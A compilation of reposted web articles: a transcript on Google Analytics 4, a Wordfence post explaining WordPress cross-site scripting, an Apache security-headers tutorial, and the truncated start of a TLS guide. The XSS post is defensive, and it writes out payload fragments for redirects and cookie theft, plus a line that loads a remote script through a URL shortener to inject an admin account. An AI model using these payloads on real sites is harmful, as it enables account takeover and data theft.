Top 4 Things to Know About GA4 — Whiteboard Friday

In this week’s Whiteboard Friday, Dana brings you some details on the exciting new world of Google Analytics 4. Watch and learn how to talk about it when clients and coworkers are intimidated by the move.https://fast.wistia.net/embed/iframe/bmdz65umai?videoFoam=true

whiteboard outlining four insights into GA4

Click on the whiteboard image above to open a high resolution version in a new tab!

Video Transcription

Hi, my name is Dana DiTomaso. I’m President at Kick Point. And I am here today at MozCon 2022 to bring you some details on the exciting world of Google Analytics 4, which I know all of you are like, “Ugh, I don’t want to learn about analytics,” which is totally fair. I also did not want to learn about analytics.

And then I kind of learned about it whether I liked it or not. And you should, too, unfortunately. 

So I think the biggest thing about the move from Universal Analytics to GA4 is that people are like they log in and everything looks different. “I don’t like it.” And then they leave. And I agree the user interface in GA4 leaves a lot to be desired. I don’t think there’s necessarily been a lot of good education, especially for those of us who aren’t analysts on a day-to-day basis.

We’re not all data scientists. I’m not a data scientist. I do marketing. So what I’m hoping is I can tell you the things you should know about GA4 on just a basic sort of level, so that you have a better vocabulary to talk about it when people are horrified by the move to GA4, which is inevitable. It’s going to happen. You’ve got to get it on your site starting basically immediately, if you don’t already have it. So I started out with three things, and then I realized there was a fourth thing. So you get a bonus, exciting bonus, but we’ll start with the first three things. 

1. It’s different

So the first thing it’s different, which I know is obvious. Yes, of course, Dana it’s different. But it’s different. Okay, so in Universal Analytics, there were different types of hits that could go into analytics, which is where hits came from originally as a metric that people talked about. So, for example, in Universal Analytics, you could have a pageview, or you could have a transaction, or you could have an event.

And those were all different types of hits. In GA4, everything is an event. There is a pageview event. There is a transaction event. There is, well, an event event. I mean, you name the events whatever you want. And because of that, it’s actually a lot better way to report on your data.

So, for example, one of the things that I know people always wanted to be able to report on in Universal Analytics is what pages did people see and how did that relate to conversion rate. And that was really tricky because a pageview was something that was at the hit scope level, which means it was just like the individual thing that happened, whereas conversion rate is a session scoped thing.

So you couldn’t mash together a hit scope thing with pageview with conversion rate, which is session scoped. They just didn’t combine together unless you did some fancy blending stuff in Data Studio. And who’s got time for that? So now in GA4, because everything is an event, you have a lot more freedom with how you can slice and dice and interpret your data and figure out what pages do people engage with before they actually converted, or what was that path, not just the landing page, but the entire user journey on their path to conversion. So that part is really exciting. 

2. Engagement rate is not reverse bounce rate

Second thing, engagement rate is a new metric in GA4. They do have bounce rate. They did recently announce it. I’m annoyed at it, so we’re going to talk about this a little bit. Engagement rate is not reverse bounce rate. But it is in GA4.

So in Universal Analytics, bounce rate was a metric that people reported on all the time, even though they shouldn’t have. I hate bounce rate so much. Just picture like a dumpster fire GIF right now across your screen. I hate bounce rate. And why I hate bounce rate is it’s so easily faked. Let’s say, for example, your boss says to you, “Hey, you know what, the bounce rate on our site is too high. Could you fix it?”

You’re like, “Oh, yeah, boss. Totally.” And then what you do is whenever somebody comes on your website, you send what’s called an interactive event off to Google Analytics at the same time. And now you have a 0% bounce rate. Congratulations. You got a raise because you made it up. Bounce rate could absolutely be faked, no question. And so when we moved over to GA4, originally there was no bounce rate.

There was engagement rate. Engagement rate has its own issues, but it’s not measuring anything similar to what bounce rate was. Bounce rate in UA was an event didn’t happen. It didn’t matter if you spent an hour and a half on the page reading it closely. If you didn’t engage in an event that was an interactive event, that meant that you were still counted as a bounce when you left that page.

Whereas in GA4, an engage session is by default someone spending 10 seconds with that tab, that website open, so active in their browser, or they visited two pages, or they had a conversion. Now this 10-second rule I think is pretty short. Ten seconds is not necessarily a lot of time for someone to be engaged with the website.

So you might want to change that. It’s under the tagging settings in your data stream. So if you go to Admin and then you click on your data stream and you go to more tagging settings and then you go to session timeouts, you can change it in there. And I would recommend playing around with that and seeing what feels right to you. Now GA4 literally just as I’m filming this has announced bounce rate, which actually it is reverse engagement rate. Please don’t use it.

Instead, think about engagement rate, which I think is a much more usable metric than bounce rate was in UA. And I’m kind of excited that bounce rate in UA is going away because it was [vocalization]. 

3. Your data will not match

All right. So next thing, your data is not going to match. And this is stressful because you’ve been reporting on UA data for years, and now all of a sudden it’s not going to match and people will be like, “But you said there were 101 users, and today you’re saying there were actually 102. What’s the problem?”

So, I mean, if you have that kind of dialogue with your leadership, you really need to have a conversation about the idea of accuracy in analytics, as in it isn’t, and error and everything else. But I mean, really the data is going to be different, and sometimes it’s a lot different. It’s not just a little bit different. And it’s because GA4 measures stuff differently than UA did. There is a page on Google Analytics Help, which goes into it in depth. But here are some of the highlights that I think you should really know sort of off the top of your head when you’re talking to people about this. 

Pageviews and unique pageviews

So first thing, a pageview metric, which we’re all familiar with, in Universal Analytics, this was all pageviews, including repeats. In GA4, same, pageview is pageview. Great.

So far so good. Then we had unique pageviews in Universal Analytics, which was only single views per session. So if I looked at the homepage and then I went to a services page and I went back to the homepage, I would have two pageviews of the homepage for pageview. I would have one pageview of the homepage in unique pageviews. That metric does not exist in GA4. So that is something to really watch for is that if you were used to reporting on unique pageviews, that is gone.

So I recommend now changing your reports to sort of like walk people through this comfort level of getting them used to the fact they’re not going to get unique pageviews anymore. Or you can implement something that I talk about in another one of my Whiteboard Fridays about being able to measure the percentage of people who are reloading tabs and tab hoarders. You could work that into this a little bit.

Users

Okay. Next thing is users. Users is really I think a difficult topic for a lot of people to get their heads around because they think, oh, user, that means that if I’m on my laptop and then I go to my mobile device, obviously I am one user. You’re usually not, unfortunately. You don’t necessarily get associated across multiple devices. Or if you’re using say a privacy- focused browser, like Safari, you may not even be associated in the same device, which kind of sucks.

The real only way you can truly measure if someone is a user across multiple sessions is if you have a login on your website, which not everybody does. A lot of B2B sites don’t have logins. A lot of small business sites don’t have logins. So users is already kind of a sketchy metric. And so unfortunately it’s one that people used to report on a lot in Universal Analytics.

So in Universal Analytics, users was total users, new versus returning. In GA4, it’s now active users. What is an active user? The documentation is a little unclear on how Google considers an active user. So I recommend reading that in depth. Just know that this is going to be different. You never should have been reporting on new versus returning users anyway, unless you had a login on your site because it was such a sketchy, bad metric, but I don’t think a lot of people knew how bad it was.

It’s okay. Just start changing your reports now so that when you have to start using GA4, on July 1, 2023, for real UA is done, then at least it’s not so much of a shock when you do make that transition. 

Sessions

So one other thing to think about as well with the changes is sessions. So in Universal Analytics, a session was the active use of a site, so you’re clicking on stuff.

It had a 30-minute timeout. And you may have heard never to use UTM tags on internal links on your website. And the reason why is because if someone clicked on an internal link on your website that had UTMs on it, your session would reset. And so you would have what’s called session breaking, where all of a sudden you would have a session that basically started in the middle of your website with a brand-new campaign and source and medium and completely detached from the session that they just had.

They would be a returning user though. That’s great. You shouldn’t have been reporting that anyway. Whereas in GA4 instead, now there’s an event because, remember, everything is an event now. There is an event that is called session start. And so that records when, well, the session starts. And then there’s also a 30-minute timeout, but there is no UTM reset.

Now that doesn’t mean that you should go out there and start using UTMs on internal links. I still don’t think it’s a great idea, but it’s not necessarily going to break things the way that it used to. So you can now see where did someone start on my site by looking at the session start event. I don’t know if it’s necessarily 100% reliable. We’ve seen situations where if you’re using consent management tools, for example, like a cookie compliance tool, you can have issues with sessions starting and whatnot.

So just keep that in mind is that it’s not necessarily totally foolproof, but it is a really interesting way to see where people started on the site in a way that you could not do this before. 

4. Use BigQuery

So bonus, bonus before we go. All right, the fourth thing that I think you should know about GA4, use BigQuery. There’s a built-in BigQuery export under the settings for GA4. Use it.

The reason why you should use it is: (a) the reports in GA4 are not great, the default reports, they kind of suck; (b) even the explorations are a bit questionable, like you can’t really format them to look nice at all. So what I’m saying to people is don’t really use the reports inside GA4 for any sort of useful reporting purposes. It’s more like an ad hoc reporting. But even then, I would still turn to BigQuery for most of my reporting needs.

And the reason why is because GA4 has some thresholding applied. So you don’t necessarily get all the data out of GA4 when you’re actually looking at reports in it. And this happened to me actually just this morning before I recorded this Whiteboard Friday. I was looking to see how many people engaged with the form on our website, and because it was a relatively low number, it said zero.

And then I looked at the data in BigQuery and it said 12. That amount could be missing from the reports in GA4, but you can see it in BigQuery, and that’s because of the thresholding that’s applied. So I always recommend using the BigQuery data instead of the GA4 data. And in Google Data Studio, if that’s what you use for your reporting tool, the same issue applies when you use GA4 as a data source.

You have the same thresholding problems. So really just use BigQuery. And you don’t need to know BigQuery. All you need to do is get the data going into BigQuery and then open up Google Data Studio and use that BigQuery table as your data source. That’s really all you need to know. No SQL required. If you want to learn it, that’s neat.

I don’t even know it that well yet. But it is not something you have to know in order to report well on GA4. So I hope that you found this helpful and you can have a little bit more of a better dialogue with your team and your leadership about GA4. I know it seems rushed. It’s rushed. Let’s all admit it’s rushed, but I think it’s going to be a really good move. I’m really excited about the new kinds of data and the amounts of data that we can capture now in GA4.

It really frees us from like the category action label stuff that we were super tied to in Universal Analytics. We can record so much more interesting data now on every event. So I’m excited about that. The actual transition itself might be kind of painful, but then a year from now, we’ll all look back and laugh, right? Thank you very much.

Video transcription by Speechpad.com

About Dana DiTomaso —

Dana is a partner at Kick Point, where she applies marketing into strategies to grow clients’ businesses, in particular to ensure that digital and traditional play well together. With her deep experience in digital, Dana can separate real solutions from wastes of time (and budget).

Source :
https://moz.com/blog/top-things-to-know-about-ga4-whiteboard-friday

Cross-Site Scripting: The Real WordPress Supervillain

Vulnerabilities are a fact of life for anyone managing a website, even when using a well-established content management system like WordPress. Not all vulnerabilities are equal, with some allowing access to sensitive data that would normally be hidden from public view, while others could allow a malicious actor to take full control of an affected website. There are many types of vulnerabilities, including broken access control, misconfiguration, data integrity failures, and injection, among others. One type of injection vulnerability that is often underestimated, but can provide a wide range of threats to a website, is Cross-Site Scripting, also known as “XSS”. In a single 30-day period, Wordfence blocked a total of 31,153,743 XSS exploit attempts, making this one of the most common attack types we see.

XSS exploit attempts blocked per day

What is Cross-Site Scripting?

Cross-Site Scripting is a type of vulnerability that allows a malicious actor to inject code, usually JavaScript, into otherwise legitimate websites. The web browser being used by the website user has no way to determine that the code is not a legitimate part of the website, so it displays content or performs actions directed by the malicious code. XSS is a relatively well-known type of vulnerability, partially because some of its uses are visible on an affected website, but there are also “invisible” uses that can be much more detrimental to website owners and their visitors.

Without breaking XSS down into its various uses, there are three primary categories of XSS that each have different aspects that could be valuable to a malicious actor. The types of XSS are split into stored, reflected, and DOM-based XSS. Stored XSS also includes a sub-type known as blind XSS.

Stored Cross-Site Scripting could be considered the most nefarious type of XSS. These vulnerabilities allow exploits to be stored on the affected server. This could be in a comment, review, forum, or other element that keeps the content stored in a database or file either long-term or permanently. Any time a victim visits a location the script is rendered, the stored exploit will be executed in their browser.

An example of an authenticated stored XSS vulnerability can be found in version 4.16.5 or older of the Leaky Paywall plugin. This vulnerability allowed code to be entered into the Thousand Separator and Decimal Separator fields and saved in the database. Any time this tab was loaded, the saved code would load. For this example, we used the JavaScript onmouseover function to run the injected code whenever the mouse went over the text box, but this could easily be modified to onload to run the code as soon as the page loads, or even onclick so it would run when a user clicks a specified page element. The vulnerability existed due to a lack of proper input validation and sanitization in the plugin’s class.php file. While we have chosen a less-severe example that requires administrator permissions to exploit, many other vulnerabilities of this type can be exploited by unauthenticated attackers.

Example of stored XSS

Blind Cross-Site Scripting is a sub-type of stored XSS that is not rendered in a public location. As it is still stored on the server, this category is not considered a separate type of XSS itself. In an attack utilizing blind XSS, the malicious actor will need to submit their exploit to a location that would be accessed by a back-end user, such as a site administrator. One example would be a feedback form that submits feedback to the administrator regarding site features. When the administrator logs in to the website’s admin panel, and accesses the feedback, the exploit will run in the administrator’s browser.

This type of exploit is relatively common in WordPress, with malicious actors taking advantage of aspects of the site that provide data in the administrator panel. One such vulnerability was exploitable in version 13.1.5 or earlier of the WP Statistics plugin, which is designed to provide information on website visitors. If the Cache Compatibility option was enabled, then an unauthenticated user could visit any page on the site and grab the _wpnonce from the source code, and use that nonce in a specially crafted URL to inject JavaScript or other code that would run when statistics pages are accessed by an administrator. This vulnerability was the result of improper escaping and sanitization on the ‘platform’ parameter.

Example of blind XSS

Reflected Cross-Site Scripting is a more interactive form of XSS. This type of XSS executes immediately and requires tricking the victim into submitting the malicious payload themselves, often by clicking on a crafted link or visiting an attacker-controlled form. The exploits for reflected XSS vulnerabilities often use arguments added to a URL, search results, and error messages to return data back in the browser, or send data to a malicious actor. Essentially, the threat actor crafts a URL or form field entry to inject their malicious code, and the website will incorporate that code in the submission process for the vulnerable function. Attacks utilizing reflected XSS may require an email or message containing a specially crafted link to be opened by an administrator or other site user in order to obtain the desired result from the exploit. This XSS type generally involves some degree of social engineering in order to be successful and it’s worth noting that the payload is never stored on the server so the chance of success relies on the initial interaction with the user.

In January of 2022, the Wordfence team discovered a reflected XSS vulnerability in the Profile Builder – User Profile & User Registration Forms plugin. The vulnerability allowed for simple page modification, simply by specifically crafting a URL for the site. Here we generated an alert using the site_url parameter and updated the page text to read “404 Page Not Found” as this is a common error message that will not likely cause alarm but could entice a victim to click on the redirect link that will trigger the pop-up.

Example of reflected XSS

DOM-Based Cross-Site Scripting is similar to reflected XSS, with the defining difference being that the modifications are made entirely in the DOM environment. Essentially, an attack using DOM-based XSS does not require any action to be taken on the server, only in the victim’s browser. While the HTTP response from the server remains unchanged, a DOM-based XSS vulnerability can still allow a malicious actor to redirect a visitor to a site under their control, or even collect sensitive data.

One example of a DOM-based vulnerability can be found in versions older than 3.4.4 of the Elementor page builder plugin. This vulnerability allowed unauthenticated users to be able to inject JavaScript code into pages that had been edited using either the free or Pro versions of Elementor. The vulnerability was in the lightbox settings, with the payload formatted as JSON and encoded in base64.

Example of DOM-based XSS

How Does Cross-Site Scripting Impact WordPress Sites?

WordPress websites can have a number of repercussions from Cross-Site Scripting (XSS) vulnerabilities. Because WordPress websites are dynamically generated on page load, content is updated and stored within a database. This can make it easier for a malicious actor to exploit a stored or blind XSS vulnerability on the website which means an attacker often does not need to rely on social engineering a victim in order for their XSS payload to execute.

Using Cross-Site Scripting to Manipulate Websites

One of the most well-known ways that XSS affects WordPress websites is by manipulating the page content. This can be used to generate popups, inject spam, or even redirect a visitor to another website entirely. This use of XSS provides malicious actors with the ability to make visitors lose faith in a website, view ads or other content that would otherwise not be seen on the website, or even convince a visitor that they are interacting with the intended website despite being redirected to a look-alike domain or similar website that is under the control of of the malicious actor.

When testing for XSS vulnerabilities, security researchers often use a simple method such as alert() prompt() or print() in order to test if the browser will execute the method and display the information contained in the payload. This typically looks like the following and generally causes little to no harm to the impacted website:

Example of XSS popup

This method can also be used to prompt a visitor to provide sensitive information, or interact with the page in ways that would normally not be intended and could lead to damage to the website or stolen information.

One common type of XSS payload we see when our team performs site cleanings is a redirect. As previously mentioned, XSS vulnerabilities can utilize JavaScript to get the browser to perform actions. In this case an attacker can utilize the window.location.replace() method or other similar method in order to redirect the victim to another site. This can be used by an attacker to redirect a site visitor to a separate malicious domain that could be used to further infect the victim or steal sensitive information.

In this example, we used onload=location.replace("https://wordfence.com") to redirect the site to wordfence.com. The use of onload means that the script runs as soon as the element of the page that the script is attached to loads. Generating a specially crafted URL in this manner is a common method used by threat actors to get users and administrators to land on pages under the actor’s control. To further hide the attack from a potential victim, the use of URL encoding can modify the appearance of the URL to make it more difficult to spot the malicious code. This can even be taken one step further in some cases by slightly modifying the JavaScript and using character encoding prior to URL encoding. Character encoding helps bypass certain character restrictions that may prevent an attack from being successful without first encoding the payload.

Example of XSS redirect

When discussing manipulation of websites, it is hard to ignore site defacements. This is the most obvious form of attack on a website, as it is often used to replace the intended content of the website with a message from the bad actor. This is often accomplished by using JavaScript to force the bad actor’s intended content to load in place of the original site content. Utilizing JavaScript functions like document.getElementByID() or window.location() it is possible to replace page elements, or even the entire page, with new content. Defacements require a stored XSS vulnerability, as the malicious actor would want to ensure that all site visitors see the defacement.

Example of XSS defacement

This is, of course, not the only way to deface a website. A defacement could be as simple as modifying elements of the page, such as changing the background color or adding text to the page. These are accomplished in much the same way, by using JavaScript to replace page elements.

Stealing Data With Cross-Site Scripting

XSS is one of the easier vulnerabilities a malicious actor can exploit in order to steal data from a website. Specially crafted URLs can be sent to administrators or other site users to add elements to the page that send form data to the malicious actor as well as, or instead of, the intended location of the data being submitted on the website under normal conditions.

The cookies generated by a website can contain sensitive data or even allow an attacker to access an authenticated user’s account directly. One of the simplest methods of viewing the active cookies on a website is to use the document.cookie JavaScript function to list all cookies. In this example, we sent the cookies to an alert box, but they can just as easily be sent to a server under the attacker’s control, without even being noticeable to the site visitor.

Example of stealing cookies with XSS

While form data theft is less common, it can have a significant impact on site owners and visitors. The most common way this would be used by a malicious actor is to steal credit card information. It is possible to simply send input from a form directly to a server under the bad actor’s control, however it is much more common to use a keylogger. Many payment processing solutions embed forms from their own sites, which typically cannot be directly accessed by JavaScript running in the context of an infected site. The use of a keylogger helps ensure that usable data will be received, which may not always be the case when simply collecting form data as it is submitted to the intended location.

Here we used character encoding to obfuscate the JavaScript keystroke collector, as well as to make it easy to run directly from a maliciously crafted link. This then sends collected keystrokes to a server under the threat actor’s control, where a PHP script is used to write the collected keystrokes to a log file. This technique could be used as we did here to target specific victims, or a stored XSS vulnerability could be taken advantage of in order to collect keystrokes from any site visitor who visits a page that loads the malicious JavaScript code. In either use-case, a XSS vulnerability must exist on the target website.

Example of XSS form theft

If this form of data theft is used on a vulnerable login page, a threat actor could easily gain access to usernames and passwords that could be used in later attacks. These attacks could be against the same website, or used in credential stuffing attacks against a variety of websites such as email services and financial institutions.

Taking Advantage of Cross-Site Scripting to Take Over Accounts

Perhaps one of the most dangerous types of attacks that are possible through XSS vulnerabilities is an account takeover. This can be accomplished through a variety of methods, including the use of stolen cookies, similar to the example above. In addition to simply using cookies to access an administrator account, malicious actors will often create fake administrator accounts under their control, and may even inject backdoors into the website. Backdoors then give the malicious actor the ability to perform further actions at a later time.

If a XSS vulnerability exists on a site, injecting a malicious administrator user can be light work for a threat actor if they can get an administrator of a vulnerable website to click a link that includes an encoded payload, or if another stored XSS vulnerability can be exploited. In this example we injected the admin user by pulling the malicious code from a web-accessible location, using a common URL shortener to further hide the true location of the malicious location. That link can then be utilized in a specially crafted URL, or injected into a vulnerable form with something like onload=jQuery.getScript('https://bit.ly/<short_code>'); to load the script that injects a malicious admin user when the page loads.

Example of adding a malicious admin user with XSS

Backdoors are a way for a malicious actor to retain access to a website or system beyond the initial attack. This makes backdoors very useful for any threat actor that intends to continue modifying their attack, collect data over time, or regain access if an injected malicious admin user is removed by a site administrator. While JavaScript running in an administrator’s session can be used to add PHP backdoors to a website by editing plugin or theme files, it is also possible to “backdoor” a visitor’s browser, allowing an attacker to run arbitrary commands as the victim in real time. In this example, we used a JavaScript backdoor that could be connected to from a Python shell running on a system under the threat actor’s control. This allows the threat actor to run commands directly in the victim’s browser, allowing the attacker to directly take control of it, and potentially opening up further attacks to the victim’s computer depending on whether the browser itself has any unpatched vulnerabilities.

Often, a backdoor is used to retain access to a website or server, but what is unique about this example is the use of a XSS vulnerability in a website in order to gain access to the computer being used to access the affected website. If a threat actor can get the JavaScript payload to load any time a visitor accesses a page, such as through a stored XSS vulnerability, then any visitor to that page on the website becomes a potential victim.

Example of a XSS backdoor

Tools Make Light Work of Exploits

There are tools available that make it easy to exploit vulnerabilities like Cross-Site Scripting (XSS). Some tools are created by malicious actors for malicious actors, while others are created by cybersecurity professionals for the purpose of testing for vulnerabilities in order to prevent the possibility of an attack. No matter what the purpose of the tool is, if it works malicious actors will use it. One such tool is a freely available penetration testing tool called BeEF. This tool is designed to work with a browser to find client-side vulnerabilities in a web app. This tool is great for administrators, as it allows them to easily test their own webapps for XSS and other client-side vulnerabilities that may be present. The flip side of this is that it can also be used by threat actors looking for potential attack targets.

One thing that is consistent in all of these exploits is the use of requests to manipulate the website. These requests can be logged, and used to block malicious actions based on the request parameters and the strings contained within the request. The one exception is that DOM-based XSS cannot be logged on the web server as these are processed entirely within the victim’s browser. The request parameters that malicious actors typically use in their requests are often common fields, such as the WordPress search parameter of $_GET[‘s’] and are often just guesswork hoping to find a common parameter with an exploitable vulnerability. The most common request parameter we have seen threat actors attempting to attack recently is $_GET[‘url’] which is typically used to identify the domain name of the server the website is loaded from.

Top 10 parameters in XSS attacks

Conclusion

Cross-Site Scripting (XSS) is a powerful, yet often underrated, type of vulnerability, at least when it comes to WordPress instances. While XSS has been a long-standing vulnerability in the OWASP Top 10, many people think of it only as the ability to inject content like a popup, and few realize that a malicious actor could use this type of vulnerability to inject spam into a web page or redirect a visitor to the website of their choice, convince a site visitor to provide their username and password, or even take over the website with relative ease all thanks to the capabilities of JavaScript and working knowledge of the backend platform.

One of the best ways to protect your website against XSS vulnerabilities is to keep WordPress and all of your plugins updated. Sometimes attackers target a zero-day vulnerability, and a patch is not available immediately, which is why the Wordfence firewall comes with built-in XSS protection to protect all Wordfence users, including FreePremiumCare, and Response, against XSS exploits. If you believe your site has been compromised as a result of a XSS vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

Source :
https://www.wordfence.com/blog/2022/09/cross-site-scripting-the-real-wordpress-supervillain/

Seven Important Security Headers for Your Website

When it comes to securing your website, it’s all about minimizing attack surface and adding more layers of security. One strong layer that you can (and should) add is proper HTTP security headers. When responding to requests, your server should include security headers that help stop unwanted activity like XSS, MITM, and click-jacking attacks. While sending security headers does not guarantee 100% defense against all such attacks, it does help modern browsers keep things secure. So in this tutorial, we walk through seven of the most important and effective HTTP security headers to add a strong layer of security to your Apache-powered website.

Contents

Note: You can verify your site’s security headers using a free online tool such as the one provided by SecurityHeaders.com.

X-XSS-Protection

The X-XSS-Protection security header enables the XSS filter provided by modern web browsers (IE8+, Chrome, Firefox, Safari, et al). Here is the recommended configuration for this header:

# X-XSS-Protection
<IfModule mod_headers.c>
	Header set X-XSS-Protection "1; mode=block"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to block any requests containing malicious scripts. For more configuration options and further information about X-XSS-Protection, check out these resources:

X-Frame-Options

The X-Frame-Options (XFO) security header helps modern web browsers protect your visitors against clickjacking and other threats. Here is the recommended configuration for this header:

# X-Frame-Options
<IfModule mod_headers.c>
	Header set X-Frame-Options "SAMEORIGIN"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to block any frames/content requested from external locations. So if your own site includes an iframe that loads a resources from the same domain, the content will load normally. But if any iframe is included that loads resources from any other domain, the content will be blocked. For more configuration options and further information about X-Frame-Options, check out these resources:

X-Content-Type-Options

The X-Content-Type-Options security header enables supportive browsers to protect against MIME-type sniffing exploits. It does this by disabling the browser’s MIME sniffing feature, and forcing it to recognize the MIME type sent by the server. This header is very flexible and may be configured extensively, however the most common implementation looks like this:

# X-Content-Type-Options
<IfModule mod_headers.c>
	Header set X-Content-Type-Options "nosniff"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to use the MIME type declared by the origin server. There are a couple of precautions to keep in mind. First, as with any security header, it does not stop 100% of all attacks or threats; it does stop some of them, however, and thus provides another layer of protection for your site. Also note that this header currently is supported only in Chrome and later versions of Internet Explorer. Hopefully other browsers will add support in the future. For more configuration options and further information about X-Content-Type-Options, check out these resources:

Strict-Transport-Security

The Strict-Transport-Security (HSTS) header instructs modern browsers to always connect via HTTPS (secure connection via SSL/TLS), and never connect via insecure HTTP (non-SSL) protocol. While there are variations to how this header is configured, the most common implementation looks like this:

# Strict-Transport-Security
<IfModule mod_headers.c>
	Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to always use HTTPS for connections. This helps stop man-in-the-middle (MITM) and other attacks targeting insecure HTTP connections. For more configuration options and further information about Strict-Transport-Security, check out these resources:

Referrer-Policy

The Referrer-Policy security header instructs modern browsers how to handle or exclude the Referer header (yes the header normally is spelled incorrectly, missing an “r”). For those who may not be familiar, the Referer header contains information about where a request is coming from. So for example if you are at example.com and click a link from there to domain.tld, the Referer header would specify example.com as the “referring” URL.

With that in mind, the Referrer-Policy enables you to control whether or not the Referer header is included with the request. Here is an example showing how to add the Referrer-Policy header via Apache:

# Referrer-Policy
<IfModule mod_headers.c>
	Header set Referrer-Policy "same-origin"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to only set the referrer header for request from the current domain (same-origin). Keep in mind that this header is less about security and more about controlling referrer information, as is required by various rules and regulations (e.g., GDPR). For more configuration options and further information about Referrer-Policy, check out these resources:

Feature-Policy

The Feature-Policy header tells modern browsers which browser features are allowed. For example, if you want to ensure that only geolocation and vibrate features are allowed, you can configure the Feature-Policy header accordingly. It also enables you to control the origin for each specified feature. Here is an example showing how to add a Feature-Policy header via Apache:

# Feature-Policy
<IfModule mod_headers.c>
	Header set Feature-Policy "geolocation 'self'; vibrate 'none'"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to enable only geo-location and vibrate features. Keep in mind that this header is less about security and more about ensuring a smooth experience for your users. For more configuration options and further information about Feature-Policy, check out these resources:

Content-Security-Policy

The Content-Security-Policy (CSP) header tells modern browsers which dynamic resources are allowed to load. This header is especially helpful at stopping XSS attacks and other malicious activity. This header provides extensive configuration options, which will need to be fine-tuned to match the specific resources required by your site. Otherwise if the header configuration does not match your site’s requirements, some resources may not load (or work) properly.

Because of this, there isn’t one most common example to look at. So instead here are a few different examples, each allowing different types of resources.

Example 1

First example, here is a CSP directive that allows resources from a CDN, and disallows any framed content or media plugins. This example is from the Google docs page linked below.

# Content-Security-Policy - Example 1
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src https://cdn.example.com; child-src 'none'; object-src 'none'"
</IfModule>

Example 2

Second example, this CSP directive enables script resources loaded from a jQuery subdomain, and limits stylesheets and images to the current domain (self). This example is from the Mozilla docs page linked below.

# Content-Security-Policy - Example 2
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src 'none'; img-src 'self'; script-src 'self' https://code.jquery.com; style-src 'self'"
</IfModule>

Example 3

And for a third example, here is the directive I use on most of my WordPress-powered sites. Logically these sites tend to use the same types of resources, so I can keep things simple and use the following code on all sites:

# Content-Security-Policy - Example 3
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src https:; font-src https: data:; img-src https: data:; script-src https:; style-src https:;"
</IfModule>

To get a better idea of what’s happening here, let’s apply a bit of formatting to the code:

Header set Content-Security-Policy "

default-src https:; 
font-src    https: data:; 
img-src     https: data:; 
script-src  https:; 
style-src   https:;

"

Stare at that for a few moments and you should get the idea: the header is setting the allowed source(s) for fonts, images, scripts, and styles. For each of these, a secure HTTPS connection is required. The only exception is also to allow data URIs as a source for fonts and images.

So for any of these examples, when added to your site’s .htaccess file or server configuration file, the code tells supportive browsers which dynamic resources are allowed and/or not allowed. But seriously, if you’re thinking about adding the powerful Content-Security-Policy security header, take a few moments to read thru some of the documentation:

Where to get help with CSP

Yes CSP can be confusing, but there is no reason to despair. There are numerous online tools that make it easier to figure out how to implement CSP, for example here are some top sites:

A quick search for “csp test online” yields many results.

Even better, they now have “CSP generators” that literally write the code for you based on your input variables. Here are two solid looking CSP generators:

There are lots of useful tools out there to make CSP easier. Just enter your infos and copy/paste the results. If in doubt, use multiple tools and compare the results; the code should be the same. If not, don’t hesitate to reach out to the tool providers, who will be able to answer any questions, etc.

All Together

For the sake of easy copy/pasting, here is a code snippet that combines all of the above-described security headers.

Important: before adding this code to your site, make sure to read through each technique as explained in corresponding sections above. There may be important notes and information that you need to understand regarding each particular directive included in this code snippet.

# Security Headers
<IfModule mod_headers.c>
	Header set X-XSS-Protection "1; mode=block"
	Header set X-Frame-Options "SAMEORIGIN"
	Header set X-Content-Type-Options "nosniff"
	Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
	# Header set Content-Security-Policy ...
	Header set Referrer-Policy "same-origin"
	Header set Feature-Policy "geolocation 'self'; vibrate 'none'"
</IfModule>

As with each of the above techniques, this code may be added to your site via .htaccess or Apache config. Understand that this technique includes commonly used configurations for each of the included headers. You can (and should) go through each one to make sure that the configuration matches the requirements and goals of your site. Also remember to test thoroughly before going live.

Note: Notice the following line in the above “Security Headers” code snippet:

# Header set Content-Security-Policy ...

The pound sign or hash tag or whatever you want to call it means that the line is disabled and is ignored by the server. This means that the Content-Security-Policy directive is “commented out” and thus not active in this technique. Why? Because as explained previously, there is no recommended “one-size-fits-all” CSP example that works perfectly in all websites. Instead, you will need to replace the commented out line with your own properly configured CSP header, as explained above.

SSL and TLS Deployment Best Practices

Version 1.6-draft (15 January 2020)

SSL/TLS is a deceptively simple technology. It is easy to deploy, and it just works–except when it does not. The main problem is that encryption is not often easy to deploy correctly. To ensure that TLS provides the necessary security, system administrators and developers must put extra effort into properly configuring their servers and developing their applications.

In 2009, we began our work on SSL Labs because we wanted to understand how TLS was used and to remedy the lack of easy-to-use TLS tools and documentation. We have achieved some of our goals through our global surveys of TLS usage, as well as the online assessment tool, but the lack of documentation is still evident. This document is a step toward addressing that problem.

Our aim here is to provide clear and concise instructions to help overworked administrators and programmers spend the minimum time possible to deploy a secure site or web application. In pursuit of clarity, we sacrifice completeness, foregoing certain advanced topics. The focus is on advice that is practical and easy to follow. For those who want more information, Section 6 gives useful pointers.

1 Private Key and Certificate

In TLS, all security starts with the server’s cryptographic identity; a strong private key is needed to prevent attackers from carrying out impersonation attacks. Equally important is to have a valid and strong certificate, which grants the private key the right to represent a particular hostname. Without these two fundamental building blocks, nothing else can be secure.

1.1 Use 2048-Bit Private Keys

